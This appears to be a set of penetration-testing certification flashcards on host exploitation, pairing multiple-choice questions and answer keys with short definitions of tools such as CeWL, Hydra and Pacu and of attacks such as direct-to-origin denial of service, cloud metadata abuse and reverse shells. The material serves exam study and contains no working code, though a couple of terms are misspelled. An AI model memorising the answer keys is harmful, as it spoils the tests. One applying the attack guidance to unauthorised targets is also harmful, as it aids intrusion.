Chap 10 - Exploiting Host Vulnerabilities

Question 1

Scott wants to crawl his penetration testing target’s website and then build a word list using the data he recovers to help with his password cracking efforts. Which of the following tools should he use?

A. DirBuster
B. CeWL
C. OLLY
D. Grep‐o‐matic

Answer 1

CeWL

The Customer Wordlist Generator, or CeWL, is a tool designed to spider a website and then build a word list using the files and web pages that it finds. The word list can then be used to help with password cracking.

Question 2

CeWL

Answer 2

CeWL is a tool referred to as the “Custom Word List Generator.” It is a Ruby application that spiders websites to create wordlists based on the content it discovers, which can then be used in tasks such as password cracking

Question 3

OLLY

Answer 3

OllyDbg is a Windows-specific debugger that operates at the assembly language level, making it suitable for reverse engineering and dynamic analysis of executable files

Question 4

DirBuster

Answer 4

DirBuster is a Java application designed to brute-force directories and filenames on web servers, often used during penetration testing to discover hidden files and directories. Although it is included in the PenTest+ objectives, it has not been updated since 2013, and alternatives may be more practical in modern scenarios

Question 5

Michelle wants to attack the underlying hypervisor for a virtual machine. What type of attack is most likely to be successful?

A. Container escape
B. Compromise the administrative interface
C. Hypervisor DoS
D. VM escape

Answer 5

Compromise the administrative interface

The most practical answer is to compromise the administrative interface for the underlying hypervisor. Although VM escape would be a useful tool, very few VM escape exploits have been discovered, and each has been quickly patched. That means that penetration testers can’t rely on one being available and unpatched when they encounter a VM host and should instead target administrative rights and access methods.

Question 6

Jeff identifies the IP address contained in content delivery network (CDN) configuration for his target organization. He knows that that server’s content is replicated by the CDN, and that if he is able to conduct a denial‐of‐service attack on the host he will be able to take down his target’s web presence. What type of attack is Jeff preparing to conduct?

A. A side ‐channel attack
B. A direct‐to‐origin attack
C. A federation misconfiguration attack
D. A metadata service attack

Answer 6

A direct‐to‐origin attack

Jeff is preparing a direct‐to‐origin attack, which targets the underlying system or resource behind a load balancer, CDN, or other similar system. If he can create a denial‐of‐service condition, the front‐end network or systems will not have the ability to get updates or data from it, allowing him to bypass the protections and resilience a load balancer or content delivery network provides. A side‐channel attack in most cloud environments will focus on taking advantage of being on the same physical hardware. Federation misconfiguration attacks attempt to take advantage of an insecure configuration in the federation linkages between two organizations, and metadata service attacks leverage native services provided by cloud providers intended to allow easy queries about systems and running inside their environment such as hostnames, IP addresses, or other metadata about the instances.

Question 7

Side‐channel attack

Answer 7

A Side-channel attack in cloud environments exploits the shared hardware of virtualized systems. Attackers leverage shared resources or vulnerabilities in virtualization to capture information without directly compromising the target system.

For example, resizing virtual drives can leave remnant data exposed, though modern cloud providers mitigate this risk with encryption

Question 8

D2O

Answer 8

A Direct-to-Origin (D2O) Attack is a type of distributed denial-of-service (DDoS) attack that bypasses content delivery networks (CDNs) or similar protections to directly target the original service infrastructure.

By discovering the service’s real IP address, attackers can exploit its lesser scalability or protection, effectively negating the benefits of the CDN

Question 9

Federation misconfiguration attack

Answer 9

A Federation Misconfiguration Attack targets vulnerabilities in the federation services that enable organizations to share authentication and authorization data.

Misconfigurations in these systems, such as Active Directory Federation Services (ADFS), can lead to unauthorized access or data leakage due to excessive trust or improperly secured connections between on-premise and cloud environments like Azure

Question 10

Metadata service attack

Answer 10

A Metadata Service Attack exploits cloud service metadata APIs, which are intended to provide details such as temporary credentials or configuration information for cloud instances.

In AWS, for example, attackers might access the metadata service to retrieve temporary credentials for APIs like S3, potentially escalating access to other services or sensitive data

Question 11

Claire knows that her target organization leverages a significant number of IoT devices and that she is likely to need to use one or more of them as pivot points for her penetration test. Which of the following is not a common concern when conducting a penetration test involving IoT devices?

A. Impacts to availability
B. Fragile environments
C. Data leakage
D. Data corruption

Answer 11

Data leakage

Although IoT devices may leak data due to the use of insecure protocols or data storage, that’s a concern for the defender. Pentesters should actively be looking for that sort of opportunity! Claire knows that IoT devices may fail when scanned or compromised, and that this can cause issues. They may also be part of a fragile environment that may not be designed to handle scans, or where delayed responses or downtime may cause issues for her client. She also knows that data corruption may occur if devices are not behaving properly due to a penetration test and that in environments where IoT data is critical that this could be a real issue. Claire should carefully discuss this with her client and ensure that they understand the risks and how to constrain them if testing IoT devices is important to the pentest.

Question 12

Susan wants to use a web application vulnerability scanner to help map an organization’s web presence and to identify existing vulnerabilities. Which of the following tools is best suited to her needs?

A. Paros
B. CUSpider
C. Patator
D. w3af

Answer 12

w3af

The Web Application Attack and Audit Framework (w3af) is a web application testing and exploit tool that can spider the site and test applications and other security issues that may exist there. The Paros proxy is an excellent web proxy tool often used by web application testers, but it isn’t a full‐fledged testing suite like w3af. CUSpider and other versions of Spider are tools used to find sensitive data on systems, and Patator is a brute‐force tool.

Question 13

Paros

Answer 13

Paros is a web proxy tool often used by penetration testers for evaluating web applications. It enables users to intercept, manipulate, and analyze HTTP requests and responses, but it is not a comprehensive testing suite like w3af

Question 14

Patator

Answer 14

Patator is a brute-forcing tool that supports a variety of protocols and services. It is less user-friendly compared to Hydra or Medusa because it requires more manual filtering based on result codes, but it provides unique features that can be advantageous in specific testing scenarios.

Question 15

w3af

Answer 15

w3af is a web application attack and audit framework. It is used as a tool during penetration testing to identify vulnerabilities in web applications, allowing testers to exploit and analyze them for security weaknesses. Its functionalities include both vulnerability detection and attack simulation.

Question 16

Madhuri has discovered that the organization she is conducting a penetration test against makes extensive use of industrial control systems to manage a manufacturing plant. Which of the following components is least likely to respond to her normal penetration testing tools like Nmap and Metasploit?

A. RTUs
B. Field devices
C. PLCs
D. Master stations

Answer 16

Field devices

Field devices are controlled by remote terminal units (RTUs) or programmable logic controllers (PLCs), which are likely to connect to a network and accept commands from a master station or operator station. Field devices are often controlled via digital or analog commands from the RTUs and PLCs, and are thus not likely to use protocols or access methods that are supported by normal penetration testing tools.

Question 17

RTUs

Answer 17

An RTU, or Remote Terminal Unit, is a device used in SCADA (Supervisory Control and Data Acquisition) systems. RTUs collect data from sensors and other devices and transmit it to a central system for monitoring and control. They are a key component in automating and managing industrial processes

Question 18

Field Devices

Answer 18

Field devices refer to sensors, actuators, and similar components in industrial control systems (ICS) that are controlled by RTUs (Remote Terminal Units) or PLCs (Programmable Logic Controllers).

These devices often operate using analog or digital signals and may not use standard protocols compatible with typical penetration testing tools

Question 19

PLCs

Answer 19

PLCs, or Programmable Logic Controllers, are specialized industrial computers used in automation to control machinery and processes. They are integral components of Industrial Control Systems (ICS) and are commonly employed in manufacturing, utilities, and other industrial environments.

PLCs execute specific control tasks based on input from field devices such as sensors and output to actuators

Question 20

Master station

Answer 20

Master stations are components within SCADA (Supervisory Control and Data Acquisition) systems that manage and oversee the entire SCADA environment. They are network-connected and control other components like PLCs (Programmable Logic Controllers) and RTUs (Remote Terminal Units) to ensure the proper monitoring and automation of industrial processes

Question 21

Components of SCADA

Answer 21

The components of a SCADA (Supervisory Control and Data Acquisition) system include:

• Field Devices: Sensors and actuators that collect data or perform actions.
• Remote Terminal Units (RTUs): Devices that collect data from field devices and transmit it to the master station.
• Programmable Logic Controllers (PLCs): Controllers used for automating processes and controlling field devices.
• Master Stations: Centralized systems that manage the SCADA network and oversee operations.
• Human-Machine Interfaces (HMIs): Interfaces that allow operators to monitor and control the system.

Question 22

Ben wants to conduct a penetration test against a service that uses containers hosted by a cloud service provider. Which of the following targets is not typically part of the scope for a penetration test against a containerized environment?

A. The application
B. APIs used by the containers
C. Databases used by the containers
D. The underlying containerization service

Answer 22

The underlying containerization service

Attacking the underlying cloud hosting provider’s containerization service is typically prohibited by terms of service from the provider, and is thus unlikely to be part of the scope for a penetration test of a cloud‐hosted containerization service. The application running in the container, the APIs used by the containers, and databases they access are more likely to be part of the engagement.

Question 23

Jocelyn wants to conduct a resource exhaustion attack against her penetration testing target, which uses an autoscaling service architecture that leverages a content delivery network. What technique is most likely to help her succeed?

A. A BLE attack
B. A direct‐to‐origin attack
C. An IPMI attack
D. A VM escape attack

Answer 23

A direct‐to‐origin attack

If Jocelyn wants to successfully cause a denial‐of‐service condition, her best bet is a direct‐to‐origin attack. Exhausting the resources for the source or origin server for the service is far more likely to be successful than attempting to take on the resources of a cloud‐hosted content delivery network. BLE attacks are used against devices that use Bluetooth’s low energy mode. IPMI is a set of interface specifications for remote management and monitoring for computer systems and isn’t typically a target for a resource exhaustion attack. A VM escape attack might be useful if Jocelyn had already compromised a host and wanted to gain further access, but again it isn’t a useful way to attack a service like the one that is described.

Question 24

IMPI

Answer 24

The Intelligent Platform Management Interface (IPMI) is a specialized interface used for hardware-level management of servers, especially when the operating system is non-functional or hardware issues occur. IPMIs, such as Dell’s DRAC or HP’s iLO, are often managed over Ethernet and secured within a separate VLAN

Question 25

Isabelle wants to gain access to a cloud infrastructure as a service environment. Which of the following is not a common technique to gain this type of access for a penetration test?

A. Acquire an inadvertently exposed key through a public code repository.
B. Use a brute‐force tool against a harvested credential that requires two‐factor.
C. Acquire an inadvertently exposed key through a misconfigured object store.
D. Probe for incorrectly assigned permissions for a service or system.

Answer 25

Use a brute‐force tool against a harvested credential that requires two‐factor.

Brute‐forcing multifactor is the only item on this list that is not a common method of attempting to gain access to a cloud environment. Multifactor authentication is designed to be resistant to brute force, meaning that other means would be necessary to access an account that uses it.

Question 26

Charleen has been tasked with the components of a penetration test that deal with mobile devices at a large client organization. She has been given a standard corporate device to test that uses the organization’s base configuration for devices that are issued to employees. As part of her team, you’ve been asked to provide input on the penetration testing process. Answer each of the following questions based on your knowledge about mobile device attacks, vulnerabilities, and analysis tools.

Charleen wants to use an cloned image of a phone to see if she can access it using brute‐force passcode‐breaking techniques. Which of the following techniques will allow her to do this without an automatic wipe occurring if “wipe after 10 passcode attempts” is set for the device?

A. Reverse engineering
B. Containerization
C. Sandbox analysis
D. Rainbow tables

Answer 26

Sandbox analysis

Charleen could place the device image in a controlled sandbox and make passcode attempts against it, resetting the device each time it wipes itself, allowing her to make many attempts. She could also run many copies in parallel to allow even faster brute‐force attempts. Reverse engineering is used to analyze binaries and code and does not suit this purpose. Containerization is used to place applications in a virtualized environment, and rainbow tables are used to attack hashed passwords and aren’t useful for this purpose, either.

Question 27

Charleen has been tasked with the components of a penetration test that deal with mobile devices at a large client organization. She has been given a standard corporate device to test that uses the organization’s base configuration for devices that are issued to employees. As part of her team, you’ve been asked to provide input on the penetration testing process. Answer each of the following questions based on your knowledge about mobile device attacks, vulnerabilities, and analysis tools.

Charleen has determined that the organization she is testing uses certificate pinning for their web application. What technique is most likely to help her overcome this so that she can conduct an on‐path attack?

A. Social engineering
B. Reverse engineering
C. Using a flaw in object storage security
D. Data exfiltration

Answer 27

Social engineering

Persuading a user to add an additional certificate to the system or device’s certificate store is the only option from this list that will help to defeat certificate pinning. Reverse engineering might be useful to determine what system is pinned if the certificate store isn’t available and the application is. Object storage security issues may provide access to data or a place to drop data, but there’s nothing in the question to indicate that this would be a viable solution, and data exfiltration is a term that describes getting data out of an organization.

Question 28

Charleen has been tasked with the components of a penetration test that deal with mobile devices at a large client organization. She has been given a standard corporate device to test that uses the organization’s base configuration for devices that are issued to employees. As part of her team, you’ve been asked to provide input on the penetration testing process. Answer each of the following questions based on your knowledge about mobile device attacks, vulnerabilities, and analysis tools.

Charleen wants to perform static code analysis of the mobile application her target installed on the device in her possession. Which of the following tools should she select?

A. Objection
B. MobSF
C. Frida
D. Burp Suite

Answer 28

MobSF

MobSF is the only tool listed that provides static code analysis capabilities. Objection and Frida are used for JavaScript and library injection, and Burp Suite is an application testing suite.

Question 29

Objection

Answer 29

Objection is a runtime mobile exploration tool powered by Frida. It allows penetration testers to inject runtime objects into active processes to execute code within the application’s environment, such as bypassing protections or exploring application behavior.

Question 30

Frida

Answer 30

Frida is an injection tool used to inject JavaScript or other libraries into native applications on mobile (Android and iOS) and other operating systems like Windows and macOS.

It is often employed to intercept and modify application behaviors, such as bypassing input validation or authentication processes. Frida supports various programming languages

Question 31

MobSF

Answer 31

MobSF, or the Mobile Security Framework, is an automated penetration testing, security assessment, and malware analysis framework for Android, iOS, and Windows applications.

It supports both static and dynamic analysis of applications and integrates with continuous integration/deployment models

Question 32

Burp Suite

Answer 32

Burp Suite is a web application vulnerability scanning and penetration testing toolset. It offers various versions, including a free community version, and is widely used for web application security assessments. Burp Suite is specifically highlighted in the context of web and mobile application security

Question 33

Alice is conducting a penetration test of an organization’s AWS infrastructure. What tool should she select from the following list if she wants to exploit AWS?

A. Pacu
B. Cloud Custodian
C. CloudBrute
D. BashAWS

Answer 33

Pacu

Pacu is a dedicated AWS exploitation and penetration testing framework. Cloud Custodian is a useful management tool that can be used to identify misconfigurations, CloudBrute is a cloud enumeration tool, and BashAWS was made up for this question.

Question 34

Pacu

Answer 34

Pacu is an exploitation framework specifically designed for Amazon Web Services (AWS). It includes modules to test for privilege escalation, disrupt monitoring efforts, implant backdoors via IAM modifications, and execute remote code using AWS system management tools

Question 35

Cloud Custodian

Answer 35

Cloud Custodian is a compliance and management tool for cloud services. It is often used to identify and remediate issues in cloud configurations, ensuring adherence to organizational policies and standards

Question 36

CloudBrute

Answer 36

CloudBrute is a cloud enumeration tool used to identify applications and storage across multiple cloud providers. It does not require credentials and employs brute-force techniques such as wordlists and mutations to discover cloud resources

Question 37

What type of attack focuses on accessing the underlying hardware in a shared cloud environment in order to gain information about other virtualized systems running on it?

A. A direct‐to‐origin attack
B. A watering hole attack
C. A side‐channel attack
D. An object storage attack

Answer 37

A side‐channel attack

Side‐channel attacks attempt to gain information about other systems by gathering data from an underlying system or infrastructure rather than directly from the running virtual system itself. Direct‐to‐origin attacks attempt to identify the source system that powers a content delivery network or other scaling service to allow denial‐of‐service or resource exhaustion attacks to apply to a smaller, less capable target. Watering hole attacks are a social engineering attack that leverages a frequently used website to host malware as part of an attack. An object storage attack focuses on services like S3 in AWS and often looks for improperly set permissions or other flaws that can be leveraged.

Question 38

Isaac wants to test for insecure S3 storage buckets belonging to his target organization. What process can he use to test for this type of insecure configuration?

A. Navigate to the bucket’s URL using a web browser.
B. Use APKX to automatically validate known buckets by name.
C. Use a fuzzer to generate bucket names and test them using the fuzzer’s testing capability.
D. Conduct a direct‐to‐origin attack to find the original bucket source URL.

Answer 38

Navigate to the bucket’s URL using a web browser.

One of the simplest techniques to validate if a bucket is accessible is to simply navigate to the bucket’s URL. If it provides a file listing, the bucket is not configured securely. APKX is an Android APK extractor tool. Fuzzers are used for software testing, not for bucket security testing, and direct‐to‐origin attacks attempt to bypass content delivery networks, load balancers, and similar tools to allow attacks directly against source systems for denial‐of‐service or resource exhaustion attacks.

Question 39

APKX

Answer 39

APKX is a wrapper for various Java decompilers and DEX converters that simplifies extracting Java source code from Android application packages (APKs). It is particularly useful for analyzing the Java code within APK files

Question 40

Jocelyn wants to conduct a credential harvesting attack against an organization. What technique is she most likely to employ to accomplish the attack?

A. Vulnerability scanning
B. Capturing data from other systems on the same physical host
C. Sending a phishing email
D. Using an SDK to access service configuration data.

Answer 40

Sending a phishing email

Credential harvesting can take many forms, but one of the most common options is to use a phishing attack to obtain credentials that can be used to access accounts and systems belonging to a target organization. Simply conducting vulnerability scanning will not result in credentials being obtained, capturing data from other systems on a shared underlying system is a side‐channel attack and is unlikely to result in acquiring credentials, and SDKs may provide some useful information but are unlikely to directly provide credentials.

Question 41

Simone has been asked to check for IPMI interfaces on servers at her target organization. Where is she most likely to find IPMI interfaces to probe?

A. In the organization’s DMZ
B. In a private data center VLAN
C. In the organization’s workstation VLAN
D. On the organization’s Wi‐Fi network

Answer 41

In a private data center VLAN

Most organizations recognize that IPMI interfaces need additional protection and place them on a private VLAN in their data center. Additional access controls like VPN requirements or bastion hosts are also commonly used. IPMI interfaces should not be exposed in a DMZ or a workstation VLAN, let alone on a Wi‐Fi network!

Question 42

Selah wants to use a brute‐force attack against the SSH service provided by one of her targets. Which of the following tools is not designed to brute‐force services like this?

A. Patator
B. Hydra
C. Medusa
D. Minotaur

Answer 42

Minotaur

Patator, Hydra, and Medusa are all useful brute‐forcing tools. Minotaur may be a great name for a penetration testing tool, but the authors of this book aren’t aware of any tool named Minotaur that is used by penetration testers!

Question 43

Hydra

Answer 43

Hydra is a credential testing tool commonly used in penetration testing to perform brute force attacks against various network protocols and services. It supports numerous protocols, including SSH, FTP, HTTP, and many others, enabling automated testing of login credentials during security assessments

Question 44

Medusa

Answer 44

Medusa is a credential testing tool used in penetration testing to perform brute force attacks against remote authentication services. It supports various protocols, including HTTP, SSH, FTP, and others, and is designed for speed and modularity, making it suitable for large-scale penetration testing tasks

Question 45

After compromising a remote host, Cameron uses SSH to connect to port 4444 from his penetration testing workstation. What type of remote shell has he set up?

A. A reverse shell
B. A root shell
C. A bind shell
D. A blind shell

Answer 45

A bind shell

Cameron has set up a bind shell, which connects a shell to a service port. A reverse shell would have initiated a connection from the compromised host to his penetration testing workstation (or another system Cameron has access to). The question does not provide enough information to determine if the shell might be a root shell, and blind shell is not a common penetration testing term.

Question 46

reverse shell

Answer 46

A reverse shell is a type of shell in penetration testing where the target machine initiates a connection back to the attacker’s machine.

This setup allows the attacker to gain remote access and execute commands on the target system, bypassing certain network restrictions, such as firewalls, which often block incoming connections but allow outgoing ones

Question 47

bind shell

Answer 47

A bind shell is a type of shell in penetration testing where the target machine opens a network port and listens for incoming connections from the attacker’s machine.

Once connected, the attacker can execute commands on the target system. Unlike a reverse shell, a bind shell requires the attacker to actively connect to the target, which might be restricted by firewalls or NAT configurations

Question 48

root shell

Answer 48

A root shell is a command-line interface that operates with root (administrator) privileges, granting full access to a system. In penetration testing, gaining a root shell is often a goal during privilege escalation, as it allows unrestricted execution of commands and control over the target system

Question 49

Jim wants to crack the hashes from a password file he recovered during a penetration test. Which of the following methods will typically be fastest?

A. John the Ripper
B. Rainbow Road
C. Hashcat
D. CeWL

Answer 49

Hashcat

Hashcat would be the fastest when taking advantage of a powerful graphic card, and John the Ripper will typically be the slowest of the password cracking methods listed. CeWL is a word list or dictionary generator and isn’t a password cracker, and Rainbow Road is not a penetration testing tool.